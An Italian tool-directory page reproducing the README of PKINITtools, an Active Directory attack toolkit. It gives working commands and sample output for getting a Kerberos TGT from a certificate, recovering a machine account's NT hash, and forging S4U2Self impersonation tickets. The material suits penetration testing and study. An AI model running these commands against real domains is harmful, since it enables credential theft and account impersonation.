Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PKINITtools — Strumenti per Kerberos PKINIT e relay verso AD CS | Kitploit
Strumenti/GitHubGitHub/dirkjanm/pkinittools
ExploitPenetration TestingAutenticazione
GitHubdirkjanm/pkinittools

PKINITtools

Strumenti per Kerberos PKINIT e relay verso AD CS

Vedi Repository
9221071 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumenti PKINIT

Questo repository contiene alcune utilità per giocare con PKINIT e i certificati.
Gli strumenti sono basati su minikerberos e impacket. Post del blog di accompagnamento con più contesto: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

Installazione

Questi strumenti sono compatibili solo con Python 3.5+. Clona il repository da GitHub, installa le dipendenze e dovresti essere a posto:

root@kitploit:~
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

Si consiglia di utilizzare un virtualenv per questo.

Strumenti

gettgtpkinit.py

Richiedi un TGT utilizzando un file PFX, come file o come blob codificato in base64, o file PEM per cert+key. Questo utilizza Kerberos PKINIT e produrrà un TGT nella ccache specificata. Stamperà anche la chiave di crittografia AS-REP che potrebbe servirti per lo strumento getnthash.py. Esempio di utilizzo:

root@kitploit:~
(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file

getnthash.py

Usa Kerberos U2U per inviare una richiesta TGS per te stesso. Questo includerà il PAC che a sua volta contiene l'NT hash che puoi decifrare con la chiave AS-REP utilizzata per il tuo specifico TGT. È davvero magico. Questo strumento richiede che un TGT risultante da PKINIT sia nella variabile d'ambiente KRB5CCNAME. Utilizzo:

root@kitploit:~
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from gettgtpkinit.py
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571

gets4uticket.py

Usa Kerberos S4U2Self per richiedere un ticket di servizio valido sull'host per il quale hai ottenuto un certificato. Questo ticket può quindi essere utilizzato per interagire con l'host originale. Richiede solo un TGT per l'account macchina di questo host. Questo TGT deve essere in un file ccache che specifichi in kerberos_connection_url. L'unico kerberos_connection_url accettato per questo esempio è uno contenente un file ccache, ad esempio kerberos+ccache://domain.local\\victimhostname\$:[email protected]. Lo SPN dovrebbe essere un nome di servizio sull'host che stai impersonando, non puoi usarlo per attacchi di delega (poiché non implementa S4U2Proxy, ci sono già molti strumenti per quello). Utilizzo:

root@kitploit:~
(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
  spn                   the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!

Licenza

MIT

Crediti

  • SkelSec per minikerberos
  • Alberto Solino e il team di SecureAuthCorp per impacket
  • Mor Rubin per la loro prima implementazione di PKINIT in Python come parte di AzureADJoinedMachinePTC
  • Benjamin Delpy per aver implementato queste cose in kekeo
Scarica lo strumento